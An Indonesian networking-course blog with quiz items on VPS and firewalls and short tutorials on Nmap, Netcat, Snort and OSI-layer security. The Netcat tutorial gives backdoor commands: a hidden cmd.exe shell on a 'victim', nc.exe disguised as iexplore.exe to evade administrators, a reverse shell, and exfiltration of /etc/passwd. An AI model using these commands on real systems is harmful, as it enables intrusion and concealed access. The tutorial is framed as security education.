Recent Posts

This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Jumat, 15 November 2019

Soal Administrasi Sistem Jaringan

Isian

1. Hyper V adalah jenis virtualisasi VPS yang sangat cocok digunakan pada...
 A. Linux OS
 B. Sansolaris
 C. Free BDS
 D. Windows OS
 E. Mac OS

2. Beberapa distro turunan dari Debian yang paling banyak digunakan didunia identik dengan sebagai berikut, kecuali...
 A. Xubuntu
 B. Mint
 C. Knoppix
 D. Bactrack
 E. Red hat

3. Untuk menyimpan postingan ,komentar, maupun segala informasi secara terstruktur dapat menggunakan...
 A. Apache
 B. Phpmy admin
 C. PHP
 D. Database
 E. Command line

4. Sebuah bahasa skrip yang digunakan untuk membuat blog secara dinamis adalah...
 A. Postgre SQL
 B. Apache2
 C. HTML
 D. PHP
 E. Command line

5. Jenis HDD yang biasa digunakan untuk budget hosting terbatas atau backup saja adalah...
 A. SATA
 B. SAS
 C. SSD
 D. SCSI
 E. FDD

6. Jika sebuah VPS yang diwujudkan dalam bentuk server kosong atau hanya berisi IP, root, dan password adalah...
 A. Attached
 B. Managed
 C. Attachment
 D. Unmanaged
 E. Developer

7. Dalam sebuah VPS, resource server yang alokasikan sebagai berikut, kecuali...
 A. CPU core
 B. Monitoring
 C. CPU usage
 D. RAM
 E. Storage

8. HDD identik dengan piringan metal yang memiliki lapisan magnet yang dilihat secara...
 A. Material
 B. Chemical
 C. Logical
 D. Spesifik
 E. Non-volatile

9. VPS cocok digunakan bagi pemilik situs yang memiliki pengunjung web/blog dengan angka diatas...
 A. 8
 B. 7
 C. 6
 D. 5
 E. 4

10. Aplikasi yang mutlak dibutuhkan jika ingin menggunakan VPS sebagai web hosting adalah ...
 A. Linux
 B. Apache
 C. MySQL
 D. PHP
 E. Attached

ESSAY!

1. Sebutkan yang anda ketahui tentang jenis-jenis VPS dimasa sekarang!
OpenVZ, KVM, HVM, Hyper V

2. Uraikan yang anda ketahui tentang implementasi hosting server IIX Jakarta!
3. Terangkan yang anda ketahui tentang prinsip-prinsip dasar VPS!
4. Jabarkan perbedaan antar HVM (Hardware Virtual Machine) dengan hyper V!
5. Mengapa seorang user harus meng-upgrade web hosting ke VPS?


Soal Administrasi Infrastruktur Jaringan


ISIAN!

1.Berikut yang bukan termasuk tipe-tipe firewall adalah....
A. Screened subnet firewall
B. Screened host firewall
C. Dual-homed gateway firewall
D. Dual-homed host firewall
E. Packet-filtering-firewall

2. Jika dilihat dari sisi layer TCP/IP, firewall jenis proxy akan melakukan filterisasi pada layer....
A. Application layer
B. Transport layer
C. Internet layer
D. Network layer
E. Physical layer

3. Jumlah minimal interface jaringan yang digunakan pada arsitektur dual-homed host adalah...
A. 2
B. 3
C. 4
D. 5
E. 6

4. Yang bukan merupakan tipe firewall yaitu...
A. Screened subnet firewall
B. Screened host firewall
C. Screened broadcast firewall
D. Dual-homed gateway firewall
E. Packet-filtering-firewall

5. Sifat dan karakteristik utama dari IDS(Intrusion Detection System) adalah...
A. Pasif
B. Aktif
C. Kolektif
D. Desktruktif
E. Normatif

6. Mengubah alamat IP dari etho menjadi statis dengan cara melakukan pada file...
A. Etc
B. Network
C. Interface
D. Firewall
E  gateway

7. Berikut yang bukan termasuk pilihan action pada konfigurasi firewall mikrotik adalah...
A. Accept
B. Reject
C. Drop
D. Jump
E. Connect

8. Berikut ini yang bukan termasuk bagian dari firewall policies adalah...
A. Sebagai pos keamanan jaringan
B. Mencegah informasi berharga bocor tanpa sepengetahuan
C. Mencatat aktivitas hacker dan cracker dengan teliti
D. Memodifikasi paket data yang datang
E. Mencegah modifikasi data pihak lain

9. Pos pemeriksaan paket data yang terletak diantara prerouting dan postrouting yang berfungsi agar semua paket data dari luar router menuju keluar router akan diproses dibagian...
A. Formard
B. Input
C. Prerouting
D. Output
E. Postrouting

10. Sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk yang tidak aman adalah pengertian dari....
 A. Router
 B. Server
 C. Software security
 D. Application management
 E. Firewall

ESSAY!

1. Apakah yang dimaksud dengan load balancing?
Teknik untuk mendistribusikan beban trafik pada dua atau lebih jalur koneksi secara seimbang, agar trafik dapat berjalan optimal, memaksimalkan throughput, memperkecil waktu tanggap dan menghindari overload pada salah satu jalur koneksi
2. Apa yang dimaksud dengan HAProxy?
HAProxy adalah sebuah aplikasi opensource berbasis Linux yang biasa digunakan sebagai load balancing trafic jaringan. Layer 7 load balance mendistribusikan permintaan dari client berdasarkan data yang ditemukan pada layer application seperti HTTP.
3. Sebutkan fungsi proxy server!
Berfungsi untuk melakukan request terhadap kontent dari suatu jaringan internet ataupun jaringan internet. Adaupun hal-hal yang dapat dilakukan oleh web proxy diantaranya sebagai berikut: dapat menyembunyikan alamat IP address.
4. Apakah fungsi dari Accescontrol?
Suatu proses dimana user diberikan hak akses untuk mengakses systeem atau informasi. Dalam access corntrol terdapat identifikasi, otorisasi, otentifikasi dan audit. ACL merupakan daftar access control berisi perizinan dan data kemna user diberikan izin tersebut.
5. Sebutkan keuntungan menggunakan software load balancing!
Kinerja yang optimal, perfoma tinggi, bisa diandalkan, dan biaya lebih murah

Senin, 21 Oktober 2019

Setting internet pada mikrotik dengan DHCP

Artikel
Setting internet pada mikrotik dengan DHCP.
Dynamic Host Configuration Protocol (DHCP) merupakan service yang memungkinkan perangkat dapat mendistribusikan/assign IP Address secara otomatis pada host dalam sebuah jaringan. Cara kerjanya, DHCP Server akan memberikan response terhadap request yang dikirimkan oleh DHCP Client.
Selain IP Address, DHCP juga mampu mendistribusikan informasi netmask, Default gateway, Konfigurasi DNS dan NTP Server serta masih banyak lagi custom option (tergantung apakah DHCP client bisa support).
Mikrotik dapat digunakan sebagai DHCP Server maupun DHCP Client atau keduanya secara bersamaan. Sebagai contoh, misalnya kita berlangganan internet dari ISP A. ISP A tidak memberikan informasi IP statik yang harus dipasang pada perangkat kita, melainkan akan memberikan IP secara otomatis melalui proses DHCP.

Untuk melihat lebih lengkap silahkan klik link https://fileku.co/FvaZBW

Selasa, 15 Oktober 2019

12. Prosedur pembuatan laporan konfigurasi sistem keamanan jaringan

11.konfigurasi sistem keamanan jaringan linux

Jika ingin melihat konfigurasi tersebut buka link https://afing.wordpress.com/2009/01/29/konfigurasi-sistem-jaringan-linux/
Dan download https://fileku.co/K2TmGv

10.Network scanner

Jika ingin melihat artikel lengkap silahkan buka link tersebut http://keamananjaringan2.blogspot.com/2016/09/scanning-tools-menggunakan-softperfect.html?m=1

Dan download linknya https://fileku.co/vCyJgb

09.OS fingerprint

08.Nmap


Hi Sobat jarnkom, kali ini kita akan bahas tema explorasi jaringan dengan tool Nmap, yang di gunakan untuk audit keamanan jaringan yang juga cocok di pelajari oleh pelajar tkj dan sysadmin. Kita akan memplejari, Fungsi NMAP, Apa itu Nmap, Perintah Nmap, Nmap termux,  Nmap Android, dan nmap untuk scan port, berikut adalah pengertian nmap.

Pengertian Nmap

NMAP adalah singkatan dari Network Mapper, merupakan tool open source yang di gunakan khusus untuk explorasi jaringan dan audit keamanan jaringan. Gordon "Fyodor" Lyon merupakan orang yang pertama kali mengembangkan Nmap pada 1 September 1997 yang dipublikasikan pada sebuah website yang menyediakan artikel tentang keamanan komputer, yaitu Phrack Magazine Issue 51. Nama aslinya adalah Gordon Lyon (Juga Dikenaln Dengan Nama samaran Fydor Vaskovich). Adalah seorang ahli keamanan jaringan, programmer open source, dan penulis. Selain mengembangkan Nmap, Fyodor adalah salah satu anggota pendiri Honeynet project (http://honeynet.org), yaitu sebuah organisasi yang melakukan riset untuk keamanan jaringan komputer. Hingga saat ini , Nmap terus berkembang dengan berbagai fitur tambahan menarik dan membuat aplikasi ini menjadi wajib bagi sysadmin atau orang awam yang ingin belajar bagaimana cara mendeteksi celah keamanan pada suatu server.

Nmap banyak digunakan untuk melakukan scanning pada port di jaringan komputer. Port merupakan nomor yang digunakan untuk membedakan antar satu aplikasi dengan aplikasi lainnya pada jaringan komputer. Ibaratnya Anda tinggal di kota Malang dengan kode pos 65141 dan teman Anda tinggal di kota Bandung dengan kode pos 40111. Kode pos inilah yang bisa dianalogikan sebagai port untuk membedakan antara kota Malang dan Bandung. Jika pada jaringan komputer misalnya aplikasi HTTP menggunhakan port 80, SMTP menggunakan port 25, FTP menggunakan port 21 dan sebagainya. Semua aplikasi pada jaringan komputer harus memiliki nomor port agar aplikasi tersebut dapat diakses melalui port yang sudah ditentukan oleh masing-masing aplikasi. Analoginya, port ini layaknya IP Address, di mana IP Address berfungsi untuk membedakan antara satu komputer dengan komputer lainnya, sedangkan port digunakan hanya untuk membedakan aplikasi-aplikasi pada jaringan.

Di internet, kita bisa mendapatkan banyak tool untuk melakuka scanning port, namun hingga saat ini tidak satupun dari tool-tool tersebut yang dapat menawarkan fitur-fitur menarik dan ccanggih seperti Nmap. Nmap Scripting Engine (NSE) merupakan fitur dari Nmap yang membuatnya menjadi tool yang paling banyak digunakan oleh banyak orang, karena pada fitur ini pengguna Nmap dapat menulis Script-nya sendiri untuk melakukan scanning sesuai dengan keinginannya.

Nmap sangat penting dikuasai oleh seorang sysadmin. Karena dengan menguasai Nmap, sysadmin dapat melakukan scanning dan melakukan pengawasan terhadap server yang dikelolanya. Scanning yang dilakukan pun bertujuan untuk mengetahui apakah terdapat kelemahan pada jaringan tersebut.

Jangan lupa download link tersebut : https://fileku.co/ACSH8s

07.Netcat

Pengertian netcat dan fiturnya

Netcat adalah sebuah utiliti yang digunakan untuk berbagai hal yang berkaitan dengan
protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paketpaket
UDP, listen pada port port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.
Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi originalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).


FiturnyaFitur dari Netcat antara lain adalah:

* Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
* Dapat membaca argumen pada command line dari standar input
* Full DNS forwarding/reverse checking
* Kemampuan untuk menggunakan any local source port
* Kemampuan menggunakan any locally-configured network source address
* Tersedia port scanning secara built-in
* Dan lain-lain


Dengan fitur² diatas banyak pengelola system memanfaatkannya untuk melakukan hal-hal kurang lebihnya seperti berikut ini :
* Scanning port dan menginventori service-service yang terpasang pada server
* File transfer
* Pengujian dan simulasi terhadap server
* Pengujian terhadap firewall, proxy dan gateway
* Pengujian performance network
* Pengujian address spoofing
* Banner grabbing
Instalasi Netcat

Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tools/network_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda.
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download,
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat

Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt.


Port Scanning

Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka.
Banner Grabbing

Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Baris Perintah

-D Menempatkan netcat dalam mode siluman. Oleh karena itu berjalan di latar belakang. Perintah ini hanya tersedia pada windows.
-E <command> Jika dikompilasi menjadi pilihan GAPING_SECURITY_HOLE, sebuah netcat mendengarkan akan mengeksekusi <command> setiap saat seseorang membuat koneksi pada port yang itu mendengarkan
-I <seconds> ini adalah interval penundaan. Ini adalah jumlah waktu netcat menunggu antara data mengirimkan.
-G <route-list> Netcat mendukung routing longgar.
-G <hop-pointer> Pilihan ini memungkinkan Anda untuk mengontrol ip di rute-list Anda hop berikutnya.
-L ini adalah mendengarkan mode.
-L ini adalah mode mendengarkan kuat hanya availiable di windows. Ini memberitahu Netcat untuk memulai kembali modus Dengar nya dengan opsi baris perintah yang sama setelah sambungan ditutup
-N Menceritakan netcat untuk tidak melakukan pencarian nama host.
-O <hexfile> Apakah hex dump pada data dan menyimpannya dalam hexfile.
-P <port> Menentukan pelabuhan
-R Netcatchooses port lokal dan remote acak.
SSpecifies-ip alamat sumber netcat harus digunakan saat membuat koneksi nya.
-T Jika dikompilasi dengan opsi telnet netcat akan dapat menangani negosiasi dengan server telnet telnet.
-U Menceritakan netcat menggunakan UDP, bukan TCP.
-V verbose. Mengontrol berapa banyak netcat akan memberitahu Anda apa its lakukan.
-W <seconds> Kontrol berapa lama netcat akan menunggu sebelum membatalkan koneksi.
-Z Menceritakan netcat untuk hanya mengirim data yang cukup untuk menemukan port mana yang mendengarkan dalam kisaran tertentu Anda.
Pemakaian
Netcat Backdoor
Korban:
nc-L-d-p <port>-t-e cmd.exe
-L adalah perintah mendengarkan. -D memberitahu netcat untuk tidak membuka jendela ketika berjalan. -P memberikan port. -T adalah untuk telnet. -E mengaktifkan cmd.exe ketika klien terhubung secara
Klien:
nc-v <ip alamat victim>
catatan: Dalam contoh ini netcat berjalan di latar belakang pada mesin korban. Sebuah sistem admin bisa membuka task manager dan melihat bahwa nc.exe sedang berjalan. Seorang hacker pintar akan mengubah nc.exe untuk sesuatu seperti iexplorer.exe atau updatemanager.exe untuk menghindari suspiscion.
Sekarang, jika seorang sistem administrator menjalankan perintah netstat-a-n terpercaya di DOS prompt, ia mungkin melihat bahwa ada sesuatu yang berjalan pada port yang agak aneh, telnet ke port tersebut, dan menemukan trik. Namun, Windows menggunakan port acak beberapa untuk berbagai alasan dan output netstat dapat memakan waktu untuk mengurai, terutama pada sistem
dengan banyak aktivitas. Hacker mungkin akan mencoba pendekatan yang berbeda.
Jika mereka telah menyusup ke server Citrix, misalnya, diakses oleh beberapa pengguna yang berselancar di Web, Anda akan mengharapkan untuk melihat banyak Domain Name System ( DNS) lookup dan koneksi Web. Menjalankan netstat-a-n akan mengungkapkan beban keluar port TCP 80 koneksi. Alih-alih memiliki sebuah instance dari netcat mendengarkan pada kotak Windows dan menunggu untuk koneksi,
untuk contoh lain Netcat mendengarkan pada kotak remote pada port 80. Di ujung sana, hacker akan menjalankan: nc-l-p 80 Dari kotak Windows, hacker cerdik bisa “menyembunyikan” Netcat dan mengeluarkan perintah ini:
mkdir C: \ Windows \ System32 \ Drivers \ q
move  nc.exe C: \ Windows \ System32 \ Drivers \ q \ iexplore.exe
cd Windows \ System32 \ Drivers \ q
WINDOWS \ System32 \ DRIVER \ q> iexplore.exe
Cmd line:-d-e cmd.exe originix 80
WINDOWS \ System32 \ DRIVER \ q>
Sekarang Netcat mendengarkan harus mengambil perintah shell dari mesin Windows. Hal ini dapat melakukan pekerjaan yang lebih baik menyembunyikan backdoor dari administrator sistem. Pada pandangan pertama, koneksi hanya akan terlihat seperti Internet Explorer membuat koneksi HTTP biasa. Kerugian hanya untuk hacker adalah bahwa setelah mengakhiri shell, tidak ada cara restart itu di sisi Windows.
port Scanning
Perintah:
nc-z-w2 <IP Address> 1-6000
-Z memberitahu netcat untuk menjalankan scan port. -W2 memberitahu netcat menunggu selama 2 detik sebelum memutuskan. 1-6000 adalah port untuk memindai. Jika mau, Anda bisa menambahkan-v atau-vv untuk melihat lebih dari apa yang sedang terjadi sehingga:
nc-vv-z-w2 <IP Address> 1-6000
Banner grabbing
Banner grabbing adalah fungsi yang membantu Anda melihat apa yang berjalan di belakang port tertentu.
Command:
nc <IP Address> 80
Command:
GET HTTP
or
HEAD / HTTP/1.0
File Transfer
Dari sistem di mana file disimpan:
nc-l-u-p 55555 <file_we_want>
Command of receiving system::
nc-u-targethost 55555> copy_of_file
Ini dapat digunakan untuk meraih etc / passwd. Hal ini dapat dilakukan dengan memanfaatkan perintah
nc-l-u-p 55555 </ etc / passwd
Netcat melakukan transfer file di bawah radar. Ini tidak meninggalkan log lain apapun. FTP lainnya melakukan log cuti.
Setting a Trap
Anda bisa menjalankan instance dari netcat pada port hacker dapat mengharapkan untuk menemukan kerentanan. Jika baik Anda, Anda mungkin dapat menjebak hacker menggunakan sesuatu seperti perintah:
nc-l-v-e fakemail.pl-p 25 >> traplog.txt
skrip fakemail mungkin menggemakan beberapa output untuk memberitahu dunia itu berjalan versi sendmail dan praktis mengemis sebuah kanak-kanak script untuk datang hack. Setelah dia lakukan Anda bisa membanjiri dia dengan apa yang pernah Anda inginkan. Jika bagus, Anda bisa menjalankan script untuk ambil IP-nya.
Linux Backdoor
Sebagian besar tutorial ini dibangun di sekitar jendela hacking dengan netcat. Namun, yang sama dapat dilakukan pada sistem Linux dengan perintah:
nc-u-l-p 55555-e / bin / sh nc
Buat penggunaan sendiri
Ada beberapa skrip shell dan program C yang menghasilkan cara yang lebih mungkin untuk menggunakan netcat. Dengan sedikit pemahaman tentang pemrograman komputer Anda dapat membuat penggunaan sendiri dari netcat. Saya mendorong Anda untuk mencoba.
Anda mungkin berpendapat bahwa netcat adalah telnet terbaik Yah itu. Namun memiliki kemampuan jauh lebih. Netcat adalah alat favorit saya karena kesederhanaannya. Hal ini mudah dikompilasi ke dalam script atau kode. Anda mungkin berkata “, kau idiot? Ada beberapa program seperti meterpreter yang dapat digunakan sebagai backdoors yang jauh lebih mudah “Untuk ini saya mengatakan ya saya idiot.,
Tapi netcat jauh lebih dari sekedar backdoor. Anda juga mungkin berkata, “, Anda idiot Bagaimana Anda mendapatkan salinan nc.exe ke folder system32 tanpa harus akses ke komputer?.” Sekali lagi saya setuju saya bodoh tapi saya mendorong Anda untuk belajar program di C atau menulis script di perl dan menemukan cara untuk mengkompilasi nc.exe ke dalam kode atau script. Ini adalah alat untuk ada di gudang Anda, bahkan jika Anda adalah penggemar meterpreter. Ada banyak kegunaan lain dari netcat dari apa yang saya menjelaskan.
Beberapa fitur dan pemanfaatan Netcat akan dijelaskan di bawah. Namun kami harus selalu
mengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang
bukan milik anda sendiri !



Jangan lupa download link nya ; https://fileku.co/9OBKrA

06.Snort

Snort
kali ini saya akan membahas mengenai Snort Sebagai Network Intrusion Detection System (NIDS).
Snort merupakan sebuah perangkat lunak yang berfungsi untuk mengamati aktivitas dalam suatu jaringan komputer. Snort ini disebut juga sebagai NIDS yang berskala ringan (lightweight). Snort pertama kali dikenalkan pada tahun 1998 oleh Marty Roesch.
Snort menjadi sangat terkenal dan mempunyai reputasi yang baik dikarenakan memiliki beberapa karakteristik sebgai berikut:
1. Berukuran kecil – Baik source code dan rules yang dirilis hanya berukuran sekitar 2256kb.
2. Mendukung banyak Sistem Operasi – Sekarang ini Snort telah di porting ke Linux, Windows, OSX, Solaris, BSD, dan lain-lain.
3. Kemampuan yang cepat – Snort mampu mendeteksi serangan pada jaringan 100Mbps.
4. Mudah dikonfigurasi – Snort dapat dikonfigurasi sesuai dengan kebutuhan pada jaringan kita, bahkan kita dapat membuat rule sendiri untuk mendeteksi serangan baru.
5. Free – Snort ini bersifat open source dan menggunakan lisensi GPL, jadi kita tidak perlu membayar untuk dapat menggunakan snort.

Komponen Pada Snort

Snort merupakan packet sniffing yang sangat ringan. Sniffing interface yang digunakan berbasis libcap. Terdapat hubungan antara snort dan tcpdump, yaitu snort memanfaatkan tcpdump untuk mengambil (capture) paket pada jaringan. Salah satu keunggulan snort adalah snor memiliki sistem plugin yang sangat fleksibel untuk dimodifikasi.
Adapun komponen penyusun Snort itu sendiri yang mana setiap komponen memiliki fungsi masing-masing, sebagai berikut:
  • Packet capture library (libcap)
    Komponen ini yang akan memisahkan paket data yang melalui ethernet card yang selanjutnya akan digunakan oleh snort.
  • Packet Decoder
    Komponen ini mengambil data di layer 2 yang dikirim oleh komponen sebelumnya (Packet Capture Library). Untuk proses pertama yaitu dengan memisahkan Data Link (ethernet, tokenring, 802.11) kemudian protokol IP, dan yang terakhir adalah jenis paket TCP dan UDP. Hasil dari proses ini adalah adanya informasi mengenai protokol yang digunakan proses selanjutnya.
  • Preprocessor
    Selanjutnya dilakukan analisis terhadap paket sebelum diproses oleh komponen berikutnya. Adapun proses analisis yang dilakukan dapat berupa ditandai, dikelompokkan atau dihentikan karena paket yang diterima tidak lengkap.
  • Detection Engine
    Detection Engine ini bisa dikatakan sebagai jantung dari Snort. Paket yang diterima disini setelah melalui beberapa tahapan proses akan dibandingkan dengan rule yang ada atau telah ditetapkan sebelumnya. Rule disni berisi signature yang merupakan kategori serangan.
  • Output
    Setelah proses Detection Engine dilakukan maka hasilnya adalah berupa report dan alert. Snort mendukung variasi dari output yang dihasilkan, yaitu teks(ASCII), syslog, XML, binary, atau database (MySql, MsSql, PostgreSql, dan sebagainya).

Menulis Rule Snort

Seperti yang sudah disebutkan bahwa Snort memberikan fasililtas untuk penggunanya untuk dapat membuat rule sendiri yang sesuai dengan kondisi dan kebutuhan user. Namun Snort juga telah menyediakan banyak rule secara default yang mana user tidak perlu melakukan konfigurasi apapun.
Membuat rule Snort ini sangat sederhana namun dapat lebih efisien untuk trafik-trafik atau serangan tertentu. Ada beberapa hal yang harus diperhatikan saat membuat custom rule Snort.
Pass – yaitu membiarkan paket yang melewati Snort dan tidak tindakan (action) apapun.
Log – opsi ini memungkinkan untuk melakukan tindakan (log) ke lokasi direktori tertentu yang sudah ditentukan dalam file konfigurasi Snort (snort.conf)
Alert – Opsi ini memungkinkan untuk mengirimkan Alert ke sentral syslog server, popup windows melalui SMB. Dapat menggunakan tools Swatch untuk membaca file alert ini yang mana untuk memberitahukan kepada analyst bahwa ada aktivitas intrusi.
Active – Opsi ini digunakan Snort untuk mengirimkan Alert sekaligus mengerjakan/mengaktifkan rule yang lain. Sebagai contoh, ketika ada serangan maka snort akan mendeteksi melalui rule yang sudah ada kemudian mengirimkan alert dan langsung melakukan tindakan blok port tertentu sebagai tindakan preventif dari dynamic rule yang lain.
Dynamic – Opsi ini dalam kondisi idle dan akan aktif ketika rule yang bersangkutan telah aktif, seperti contoh diatas.

Mode Pengoperasian Pada Snort

Ada 3 mode operasi pada Snort, yaitu
1. Sniffer Mode – Pada mode operasi ini snort bertindak sebagai sniffer, yaitu snort dapat menangkap atau melihat semua paket yang lewat dalam jaringan dimana Snort diletakkan. Snort menampilkan hasil dari sniffing ini secara real time.
Adapun command dasar untuk menjalankan Snort ini sebagai sniffer:
snort -v (Melihat header TCP/IP paket yang lewat)
snort -vd (opsi d ini untuk menampilkan isi paket yang lewat)
snort -vde (opsi e ini untuk melihat header link layer, seperti ethernet)
2. Packet Logger Mode – Pada mode ini selain dapat melihat semua paket yang lewat, Snort juga dapat mencatat atau logging menyimpannya pada storage. Berikut ini command yang dapat dilakukan:
snort -vde -l /home/log-snort (opsi -l ini digunakan agar paket yang lewat disimpan ke file yang berada pada /home/log-snort)
snort -vde -h 192.168.14.2 -l /home/log-snort (opsi tambahan -h ini merupakan opsi yang digunakan untuk mencatat paket dari host tertentu misal pada host IP 192.168.14.2)
3. Network Intrusion Detection Mode – Dan yang ketiga adalah mode Network Intrusion Detection. Ciri khas dari mode ini adalah dengan menjalankan snort beserta file konfigurasi yang telah ditentukan (secara default file snort.conf). File snort.conf ini sudah banyak mencakup konfigurasi-konfigurasi yang dibutuhkan dalam mode ini. Berikut adalah command untuk menjalankan mode ini:
snort -vde -l /home/snort-log -c snort.conf (opsi -c ini adalah untuk membaca file config)
Snort ini merupakan IDS, dan IDS ini tidak selalu benar dan terkadang dapat membuat keputusan yang salah dalam melihat paket pada jaringan yang melewatinya. Maka diperlukan peran seorang Analyst untuk membantu mengambil tindakan pada alert yang ditampilkan oleh IDS ini. Dan seorang Analyst perlu mengetahui klasifikasi dari event yang muncul dari IDS, sebagai berikut:
  • True Positive – merupakan indikator bahwa IDS berjalan dan berfungsi dengan baik, dimana IDS mendeteksi adanya serangan dan memberikan alert kepada Analyst untuk dilakukan identifikasi lebih lanjut.
  • False Positive – merupakan tipe alert yang dihasilkan oleh IDS karena telah mendeteksi serangan yang mana cocok dengan rule dan signature pada IDS, namun serangan tersebut tidak valid.
  • True Negative – merupakan indikator dari IDS bahwa IDS melihat semua paket yang melewatinya dan untuk kasus ini paket yang lewat bukan merupakan paket yang bersifat malicious dan oleh karena itu IDS tidak memberikan alert.
  • False Negative – indikator ini menyatakan bahwa terjadi serangan pada sistem yang kita monitor namun tidak terdeteksi oleh IDS (dengan kata lain tidak ada alert), dengan kata lain serangan tersebut tidak ada yang cocok dalam kategori yang ada rule/signature dari IDS.

Mengatasi False Positive

Ketika kita membahas mengenai Alert yang dihasilkan oleh IDS maka masalah yang paling sering muncul adalah alert yang bersifat False Positive. Hal ini merupakan tantangan pada saat mengimplementasikan IDS yang dijadikan sebagai perangkat perimeter.
Diatas kita membahas sedikit mengenai Snort sebagai NIDS. False positive yang terjadi pada alert yang dihasilkan oleh Snort biasanya merupakan aktifitas percobaan serangan (intrusi), padahal aktifitas tersebut merupakan aktifitas yang sah dan dapat diabaikan.
Secara umum yang dapat menjadi indikasi bahwa alert tersebut merupakan false positive adalah adanya alert yang dihasilkan dari rule yang sama dengan jumlah yang sangat banyak melebihi biasanya. Maka dari itu tindakan pertama yang diambil adalah melakukan pengecekan sumber dan tujuan IP Address terlebih dahulu. Apabila kedua IP tersebut berasal dari dalam jaringan sendiri maka bisa dikatakan hal ini adalah false positive.
Langkah selanjutnya adalah dengan melihat rule pada Snort yang menghasilkan dan diperkirakan sebagai false positive. Dalam hal ini kita dapat mengatur ulang rule yang ada dan lebih memfokuskan lagi rule tersebut agar tidak menghasilkan alert yang salah. Bahkan apabila menurut kita rule tersebut tidak perlu diaktifkan, kita dapat menonaktifkan atau mendefinisikan rule tersebut aktif untuk beberapa sistem saja yang memang memerlukan.
Setelah langkah-langkah diatas dilakukan, maka ada kalanya perlu melakukan pengecekan pada sistem kita secara fisik apabila alert yang dihasilkan dari jaringan lokal. Karena mungkin saja terdapat kesalahan konfigurasi pada mesin sehingga menhasilkan alert-alert yang salah. Selain itu juga perlu dilakukan pengecekan pada login ke sistem dan melakukan pengecekan bahwa tidak ada orang lain yang dapat mengakses mesin tersebbut tanpa ijin yang sah.
Namun apabila alert yang dihasilkan dari jaringan luar maka kita juga perlu melakukan pengecekan terhadap mesin yang dijadikan target. Misalnya adanya percobaan login ke mesin tersebut dengan user “root” dan menghasilkan alert yang sangat banyak oleh IDS. Yang mana alert tersebut hanya merupakan feedback dari mesin bahwa tidak dapat login menggunakan user tersebut, dan pada mesin itu sendiri sudah dikonfigurasi user root sudah dinonaktifkan. Maka hal ini bisa dikategorikan sebagai false positive.
Sekian yang dapat saya tuliskan mengenai Snort Sebagai Network Intrusion Detection System (NIDS) pada kesempatan ini, semoga bermanfaat.

Jangan lupa mendownload linknya yaa... ;
https://fileku.co/6yfxKz

05.Jenis layanan jaringan pada tiap layer osi

Udah pada tau OSI Layer kan? Disini gue gak menjelaskan OSI Layer itu apa, tapi gue bakalan menjelaskan kelemahan dan menanganinya pada setiap layer. Siap guys? Budaaaaal…….

Physical Layer

Disini tempat pengolahan data dan pengiriman. Pengirimannya bisa menggunakan media kabel (wired) maupun tanpa kabel (wireless). Setiap informasi yang sekiranya sangat FATAL jika diketahui orang lain, lebih baik JANGAN menggunakan media Wireless, karena kemungkinan besar orang lain bisa malakukan penyadapan informasi jika tidak di-enkripsi dengan baik.
Kelemahan dan serangan yang mungkin terjadi:
  • Kabel dirusak, sehingga kita tidak bisa melakukan pertukaran informasi dengan orang lain
  • Menyadap kabel, sehingga dapat membaca trafik (Information Leakage)
  • Menyadap kabel, sehingga dapat menggunakan sumber daya jaringan (Illegitimate Use)
  • Menyadap kabel, sehingga dapat menyuntikkan trafik atau mengambil trafik (Integrity Violation)
Penanganan serangan :
  • Mengamankan Trunking
  • Menggunakan electromagnetic shielding

DATA LINK

Kita  harus melindungi Switch dengan media kabel, dan Access Point. Karena ini adalah titik akses jaringan pada layer ini
Mengamankan titik akses ini bisa menggunakan : 
  • Protokol 802.1x : Dapat meng-otentikasi pengguna dari peralatan yang akan melakukan hubungan dengan titik akses
  • Mac Address Authentication : Setiap peralatan jaringan komputer disertai dengan identitas yang unik dan dapat dikenali. Dengan identitas ini ditentukan otorisasi suatu komputer melalui proses penyaringan (filtering). Kelemahan dari sistem ini orang lain bisa memanipulasi dengan mengganti Mac nya dengan Mac orang lain yang memiliki otoritas/kewenangan (Baca : Mac Changer)
Serangan yang mungkin terjadi :
